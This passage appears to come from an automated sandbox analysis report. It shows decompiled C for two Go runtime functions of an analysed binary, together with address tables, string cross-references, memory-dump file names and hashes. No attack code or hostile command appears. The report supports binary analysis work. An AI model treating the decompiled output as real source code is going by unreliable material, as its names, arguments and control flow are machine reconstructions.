				E013513C0(_t105, _t110, _t111, _t114, _t125, _t131, _t167, _t181, _t194, _t201);
				_t142 = _a8;
				_t153 =  *((intOrPtr*)(_a8 + 8));
				if(_t153 == 0) {
					r9d = 0xd;
					return E01345F80(9, _t114, _t125, 0x138a1ae, _t142, _v136, _v176, _t181, 0x1387e12, _t196, _t125, _t131, _t200, _t201);
				} else {
					_v160 = _t131;
					_v120 = _t125;
					_t126 = _t153;
					_t92 = E013513C0(_t105, _t110, _t111, _t114, _t126, _t131, _t167, _t181, _t194, _t201);
					_t143 = _a8;
					if( *((long long*)(_t143 + 0x20)) != 0) {
						_v272 = _t181;
						E01358B4B(_t92,  &_v104 - 0x20);
						_v104 = 0x138a1ae;
						_v96 = 0x16;
						_v88 = _t126;
						_v80 = _t131;
						_v72 = 0x1386f3d;
						_v64 = 8;
						_v56 = _v120;
						_v48 = _v160;
						_v40 = 0x1388a32;
						_v32 = 0x11;
						_v24 =  *((intOrPtr*)(_t143 + 0x18));
						_v16 =  *((intOrPtr*)(_t143 + 0x20));
						return E01345B60(9, 6, _t109, _t114, _t126,  &_v104, _t143, _t143,  *((intOrPtr*)(_t143 + 0x18)), _v272, _t194, _t196, _t200, _t201);
					} else {
						_v168 = _t131;
						_v128 = _t126;
						_v272 = _t181;
						E01358B4B(_t92,  &_v104 - 0x20);
						_t187 = _v272;
						_v104 = 0x138a1ae;
						_v96 = 0x16;
						_v88 = _v136;
						_v80 = _v176;
						_v72 = 0x138692f;
						_v64 = 4;
						_v56 = _t126;
						_v48 = _t131;
						_v40 = 0x1386c11;
						_v32 = 6;
						_v24 = _v120;
						_t179 = _v160;
						_v16 = _v160;
						_t174 = _t143;
						_t134 =  &_v104;
						_t98 = E01345B60(9, 6, _t109, _t114, _t126, _t134, _t143, _t143, _v160, _v272, _t194, _t196, _t200, _t201);
						_t144 = _v168;
						_t166 = _v160;
						if(_v168 == _v160) {
							_v144 = _t126;
							_v184 = _t134;
							_t135 = _v120;
							_t98 = E013021C0(_t98, 9, 6, _t109, _v128, _t135, _t144);
							if(_t98 != 0) {
								_t128 =  *((intOrPtr*)(_a8 + 8));
								E013514E0(6, _t110, _t111, _t114, _t128, _t135, _t166, _t174, _t187, _t194, _t201);
								_v112 = _t128;
								_v152 = _t135;
								_t129 =  *((intOrPtr*)(_a8 + 0x10));
								_t100 = E013514E0(6, _t110, _t111, _t114, _t129, _t135, _t166, _t174, _t187, _t194, _t201);
								_t148 = _v152;
								if(_t135 != _v152) {
									L11:
									_t98 = E01345E00(9, _t114, _t129, _v144, _v184, 0x138c531, _t179, _t187, _t194, _t196, _t200, _t201);
								} else {
									_t137 = _t129;
									_t129 = _v112;
									if(E013021C0(_t100, 9, 6, _t109, _v112, _t137, _t148) != 0) {
										_t98 = E01345E00(9, _t114, _t129, _v144, _v184, 0x138bf3e, _t179, _t187, _t194, _t196, _t200, _t201);
									} else {
										goto L11;
									}
								}
							} else {
							}
						}
						return _t98;
					}
				}
			}





















































                                                                                                                            0x013066c0
                                                                                                                            0x013066c0
                                                                                                                            0x013066c0
                                                                                                                            0x013066c0
                                                                                                                            0x013066c0
                                                                                                                            0x013066c0
                                                                                                                            0x013066c0
                                                                                                                            0x013066c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01306a55
                                                                                                                            0x01306a55
                                                                                                                            0x01306a5a
                                                                                                                            0x01306a5f
                                                                                                                            0x013066cf
                                                                                                                            0x013066d6
                                                                                                                            0x013066de
                                                                                                                            0x013066e6
                                                                                                                            0x013066ee
                                                                                                                            0x013066f4
                                                                                                                            0x01306704
                                                                                                                            0x01306707
                                                                                                                            0x0130670c
                                                                                                                            0x0130670f
                                                                                                                            0x013066f6
                                                                                                                            0x013066fb
                                                                                                                            0x013066fb
                                                                                                                            0x01306717
                                                                                                                            0x0130671c
                                                                                                                            0x01306725
                                                                                                                            0x01306728
                                                                                                                            0x0130672d
                                                                                                                            0x01306735
                                                                                                                            0x01306743
                                                                                                                            0x01306a2b
                                                                                                                            0x01306a54
                                                                                                                            0x01306749
                                                                                                                            0x01306749
                                                                                                                            0x0130674e
                                                                                                                            0x01306756
                                                                                                                            0x01306759
                                                                                                                            0x0130675e
                                                                                                                            0x0130676b
                                                                                                                            0x01306941
                                                                                                                            0x0130694b
                                                                                                                            0x0130695b
                                                                                                                            0x01306963
                                                                                                                            0x0130696f
                                                                                                                            0x01306977
                                                                                                                            0x01306986
                                                                                                                            0x0130698e
                                                                                                                            0x013069a2
                                                                                                                            0x013069af
                                                                                                                            0x013069be
                                                                                                                            0x013069c6
                                                                                                                            0x013069da
                                                                                                                            0x013069e2
                                                                                                                            0x01306a14
                                                                                                                            0x01306771
                                                                                                                            0x01306771
                                                                                                                            0x01306776
                                                                                                                            0x0130678a
                                                                                                                            0x01306794
                                                                                                                            0x01306799
                                                                                                                            0x013067a4
                                                                                                                            0x013067ac
                                                                                                                            0x013067bd
                                                                                                                            0x013067ca
                                                                                                                            0x013067d9
                                                                                                                            0x013067e1
                                                                                                                            0x013067ed
                                                                                                                            0x013067f5
                                                                                                                            0x01306804
                                                                                                                            0x0130680c
                                                                                                                            0x01306820
                                                                                                                            0x01306828
                                                                                                                            0x0130682d
                                                                                                                            0x0130683a
                                                                                                                            0x0130683f
                                                                                                                            0x01306847
                                                                                                                            0x0130684c
                                                                                                                            0x01306851
                                                                                                                            0x01306859
                                                                                                                            0x0130685f
                                                                                                                            0x01306864
                                                                                                                            0x01306871
                                                                                                                            0x01306879
                                                                                                                            0x01306882
                                                                                                                            0x0130689b
                                                                                                                            0x013068a0
                                                                                                                            0x013068a5
                                                                                                                            0x013068ad
                                                                                                                            0x013068be
                                                                                                                            0x013068c1
                                                                                                                            0x013068c6
                                                                                                                            0x013068ce
                                                                                                                            0x013068e9
                                                                                                                            0x01306901
                                                                                                                            0x013068d0
                                                                                                                            0x013068d0
                                                                                                                            0x013068d3
                                                                                                                            0x013068e7
                                                                                                                            0x01306920
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013068e7
                                                                                                                            0x01306884
                                                                                                                            0x01306889
                                                                                                                            0x01306882
                                                                                                                            0x01306934
                                                                                                                            0x01306934
                                                                                                                            0x0130676b

                                                                                                                            Strings
                                                                                                                            • (types from different packages)CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyWSAGetOverlappedResult not found" not supported for cpu option "crypto/aes: input not full blockend outside usable address spacenumerical argument out of domainpani, xrefs: 013068F5
                                                                                                                            • , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidichan<-efencelistenobjectpopcntrdtscpselectsocketst, xrefs: 013067FD
                                                                                                                            • interface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not supportedremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack:, xrefs: 0130679D, 01306954, 01306A39
                                                                                                                            • interfacemSpanDeadmSpanFreentdll.dllpanicwaitpclmulqdqpreemptedpsapi.dllrecover: scavtracestackpooltracebackwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= thr, xrefs: 013066FB
                                                                                                                            • is lr: of on pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3, xrefs: 013067D2
                                                                                                                            • (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "Pacific Standard Tim, xrefs: 01306914
                                                                                                                            • is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_Hungarian, xrefs: 01306A24
                                                                                                                            • is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMaha, xrefs: 0130697F
                                                                                                                            • : missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North_ArabianOld_South_ArabianOther_ID_ContinueRegLoadMUIStringWSentence_TerminalSystemFunction036Unifi, xrefs: 013069B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (types from different packages)CertAddCertificateContextToStoreCertVerifyCertificateChainPolicyWSAGetOverlappedResult not found" not supported for cpu option "crypto/aes: input not full blockend outside usable address spacenumerical argument out of domainpani$ (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for Central European Standard TimeCentral Standard Time (Mexico)E. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "Pacific Standard Tim$ is lr: of on pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3$ is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_Hungarian$ is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMaha$, not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidichan<-efencelistenobjectpopcntrdtscpselectsocketst$: missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North_ArabianOld_South_ArabianOther_ID_ContinueRegLoadMUIStringWSentence_TerminalSystemFunction036Unifi$interface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not supportedremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack:$interfacemSpanDeadmSpanFreentdll.dllpanicwaitpclmulqdqpreemptedpsapi.dllrecover: scavtracestackpooltracebackwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= thr
                                                                                                                            • API String ID: 0-3027403543
                                                                                                                            • Opcode ID: 3d6eb57f692d0e685c34065ff43a699b8cf4f380681efe79875c56a22503b08d
                                                                                                                            • Instruction ID: 079ae1ca5b459bd1371d4c07c11c0d0414c1cbcb999340e610700ba504fa743c
                                                                                                                            • Opcode Fuzzy Hash: 3d6eb57f692d0e685c34065ff43a699b8cf4f380681efe79875c56a22503b08d
                                                                                                                            • Instruction Fuzzy Hash: F491C376208BC5C5DB60DB19F4503DAB3A5F788B88F548026DACC57B58EF79C199CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0133CE60 Relevance: 11.4, Strings: 9, Instructions: 130COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E0133CE60(void* __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, void* __rbx, void* __rdi, void* __rsi, long long __rbp, long long __r14) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				char _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _t45;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t90;
				long long _t93;
				intOrPtr _t112;
				long long _t113;
				long long _t116;
				long long _t117;
				void* _t119;
				void* _t120;
				void* _t125;
				void* _t126;
				long long _t129;
				void* _t130;

				_t129 = __r14;
				_t120 = __rsi;
				_t119 = __rdi;
				_t111 = __rbx;
				_t91 = __rax;
				_t86 = __esp;
				_t84 = __esi;
				_t83 = __edi;
				_t82 = __edx;
				_t80 = __ecx;
				_t126 = _t125 - 0x30;
				_v8 = __rbp;
				_t122 =  &_v8;
				_t112 =  *((intOrPtr*)(__r14 + 0x30));
				asm("o16 nop [eax+eax]");
				if( *((long long*)(_t112 + 0xa0)) != 0) {
					_t70 = 0x14;
					_t45 = E01330BA0(0x1389a2c, __rbx, _t122);
					asm("int3");
					asm("int3");
					L9:
					while(1) {
						if(_t126 <=  *((intOrPtr*)(_t129 + 0x10))) {
							L18:
							_t45 = E01356200(_t116, _t122);
							continue;
						}
						_t126 = _t126 - 0x40;
						_v56 = _t122;
						_t122 =  &_v56;
						_t113 =  *((intOrPtr*)(_t129 + 0x30));
						_t93 =  *((intOrPtr*)(_t113 + 0xa0));
						if(_t93 == 0) {
							L17:
							_t70 = 0x15;
							E01330BA0(0x1389daf, _t111, _t122);
							goto L18;
						}
						_v64 = _t113;
						_v72 = _t93;
						_t116 =  *((intOrPtr*)(_t93 + 0x38));
						_v96 = _t116;
						if(_t116 != _t113 ||  *((intOrPtr*)(_t93 + 4)) != 1) {
							_t81 =  *((intOrPtr*)(_t93 + 4));
							_v88 = _t113;
							E01332340(_t116, _t122, _t129);
							E01332C40( *((intOrPtr*)(_t93 + 4)), _t83, _t84, _t86, 0x1387d4c, _t111, _t122, _t129);
							E01332BC0( *((intOrPtr*)(_t93 + 4)), _t83, _t84, _t86, _v64, _t119, _t122, _t129);
							E01332C40( *((intOrPtr*)(_t93 + 4)), _t83, _t84, _t86, 0x1386bd5, _t111, _t122, _t129);
							E01332BC0(_t81, _t83, _t84, _t86, _v72, _t119, _t122, _t129);
							E01332C40(_t81, _t83, _t84, _t86, 0x1386bed, _t111, _t122, _t129);
							L01332AA0(_t82, _t83, _t86, _v96, _t113, _t122, _t129);
							E01332C40(_t81, _t83, _t84, _t86, 0x138771a, _t111, _t122, _t129);
							E01332940(_t83, _t84, _t86, _v88, _t113, _t122, _t129);
							E013325A0(_t81, _t82, _t83, _t84, _t86, _t122, _t129);
							L013323C0(_t116, _t122, _t129);
							E01330BA0(0x138af91, _t111, _t122);
							goto L17;
						}
						_v80 = _t129;
						if( *0x14814f0 != 0) {
							_t45 = E0134C8E0(_t45, _t70, _t82, _t85, _t86, _t90, _t93, _t119,  &_v56, _t129, _t130);
							_t93 = _v72;
						}
						 *((long long*)( *((intOrPtr*)(_v80 + 0x30)) + 0xa0)) = 0;
						 *((long long*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						return _t45;
						goto L19;
					}
				} else {
					_t117 =  *((intOrPtr*)(__rax + 0x38));
					_v16 = _t117;
					if(_t117 != 0) {
						L5:
						_t117 =  *((intOrPtr*)(_t117 + 0xb8));
						L6:
						_v32 = _t117;
						_v24 = _t91;
						E01332340(_t117, _t122, _t129);
						E01332C40(_t80, _t83, _t84, _t86, 0x1387dac, _t111, _t122, _t129);
						E01332940(_t83, _t84, _t86, _v16, _t112, _t122, _t129);
						E01332C40(_t80, _t83, _t84, _t86, "()+,-./0:<=?CLMPSZ[\\", _t111, _t122, _t129);
						E01332A40(_t80, _t82, _t83, _t84, _t86, _v32, _t120, _t122, _t129);
						E01332C40(_t80, _t83, _t84, _t86, 0x1387b00, _t111, _t122, _t129);
						E01332940(_t83, _t84, _t86, _v24, _t112, _t122, _t129);
						E013325A0(_t80, _t82, _t83, _t84, _t86, _t122, _t129);
						L013323C0(_t117, _t122, _t129);
						_t91 = 0x138a366;
						E01330BA0(0x138a366, _t111, _t122);
						L7:
						_t82 = 0;
						goto L6;
					}
					if( *((intOrPtr*)(__rax + 4)) != 0) {
						if(_t117 == 0) {
							goto L7;
						}
						goto L5;
					}
					 *((long long*)(_t112 + 0xa0)) = __rax;
					 *((long long*)(__rax + 0x38)) =  *((intOrPtr*)(__r14 + 0x30));
					 *((intOrPtr*)(__rax + 4)) = 1;
					return __eax;
				}
				L19:
			}

































                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce60
                                                                                                                            0x0133ce64
                                                                                                                            0x0133ce69
                                                                                                                            0x0133ce6e
                                                                                                                            0x0133ce7a
                                                                                                                            0x0133ce80
                                                                                                                            0x0133cf73
                                                                                                                            0x0133cf78
                                                                                                                            0x0133cf7e
                                                                                                                            0x0133cf7f
                                                                                                                            0x00000000
                                                                                                                            0x0133cf80
                                                                                                                            0x0133cf84
                                                                                                                            0x0133d0c0
                                                                                                                            0x0133d0c0
                                                                                                                            0x00000000
                                                                                                                            0x0133d0c0
                                                                                                                            0x0133cf8a
                                                                                                                            0x0133cf8e
                                                                                                                            0x0133cf93
                                                                                                                            0x0133cf98
                                                                                                                            0x0133cf9c
                                                                                                                            0x0133cfa6
                                                                                                                            0x0133d0aa
                                                                                                                            0x0133d0b1
                                                                                                                            0x0133d0b6
                                                                                                                            0x00000000
                                                                                                                            0x0133d0b6
                                                                                                                            0x0133cfac
                                                                                                                            0x0133cfb1
                                                                                                                            0x0133cfb7
                                                                                                                            0x0133cfbb
                                                                                                                            0x0133cfc3
                                                                                                                            0x0133d010
                                                                                                                            0x0133d013
                                                                                                                            0x0133d018
                                                                                                                            0x0133d029
                                                                                                                            0x0133d033
                                                                                                                            0x0133d044
                                                                                                                            0x0133d04e
                                                                                                                            0x0133d060
                                                                                                                            0x0133d06a
                                                                                                                            0x0133d080
                                                                                                                            0x0133d08a
                                                                                                                            0x0133d08f
                                                                                                                            0x0133d094
                                                                                                                            0x0133d0a5
                                                                                                                            0x00000000
                                                                                                                            0x0133d0a5
                                                                                                                            0x0133cfcb
                                                                                                                            0x0133cfd7
                                                                                                                            0x0133cfd9
                                                                                                                            0x0133cfde
                                                                                                                            0x0133cfde
                                                                                                                            0x0133cfec
                                                                                                                            0x0133cff7
                                                                                                                            0x0133cfff
                                                                                                                            0x0133d00f
                                                                                                                            0x00000000
                                                                                                                            0x0133d00f
                                                                                                                            0x0133ce86
                                                                                                                            0x0133ce86
                                                                                                                            0x0133ce8a
                                                                                                                            0x0133ce92
                                                                                                                            0x0133cec9
                                                                                                                            0x0133cec9
                                                                                                                            0x0133ced0
                                                                                                                            0x0133ced0
                                                                                                                            0x0133ced8
                                                                                                                            0x0133cee0
                                                                                                                            0x0133cef1
                                                                                                                            0x0133cf00
                                                                                                                            0x0133cf11
                                                                                                                            0x0133cf20
                                                                                                                            0x0133cf31
                                                                                                                            0x0133cf40
                                                                                                                            0x0133cf45
                                                                                                                            0x0133cf4a
                                                                                                                            0x0133cf4f
                                                                                                                            0x0133cf60
                                                                                                                            0x0133cf65
                                                                                                                            0x0133cf65
                                                                                                                            0x00000000
                                                                                                                            0x0133cf65
                                                                                                                            0x0133ce98
                                                                                                                            0x0133cec3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0133cec3
                                                                                                                            0x0133ce9e
                                                                                                                            0x0133cea9
                                                                                                                            0x0133cead
                                                                                                                            0x0133cebd
                                                                                                                            0x0133cebd
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            • ()+,-./0:<=?CLMPSZ[\, xrefs: 0133CF05
                                                                                                                            • m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11Wa, xrefs: 0133D038
                                                                                                                            • wirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenlan, xrefs: 0133CF4F
                                                                                                                            • wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Stan, xrefs: 0133CF6C
                                                                                                                            • ) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOfFileSora_SompengSyloti_NagriTransmitFileUnlockFileExVirtualA, xrefs: 0133CF25
                                                                                                                            • releasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base, xrefs: 0133D01D
                                                                                                                            • wirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFi, xrefs: 0133CEE5
                                                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShar, xrefs: 0133D06F
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutia, xrefs: 0133D0AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11Wa$ p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShar$()+,-./0:<=?CLMPSZ[\$) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOfFileSora_SompengSyloti_NagriTransmitFileUnlockFileExVirtualA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutia$releasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base$wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Stan$wirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenlan$wirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFi
                                                                                                                            • API String ID: 0-1304509279
                                                                                                                            • Opcode ID: 9f79ace69b4d66eb0cc0867999860c4cd7383cca0cc3cb8ab2c9e6c9baedf71a
                                                                                                                            • Instruction ID: 9c783f24af1180a9239c00f90daa67c161136b55c40dca299eb021bd1327b8c4
                                                                                                                            • Opcode Fuzzy Hash: 9f79ace69b4d66eb0cc0867999860c4cd7383cca0cc3cb8ab2c9e6c9baedf71a
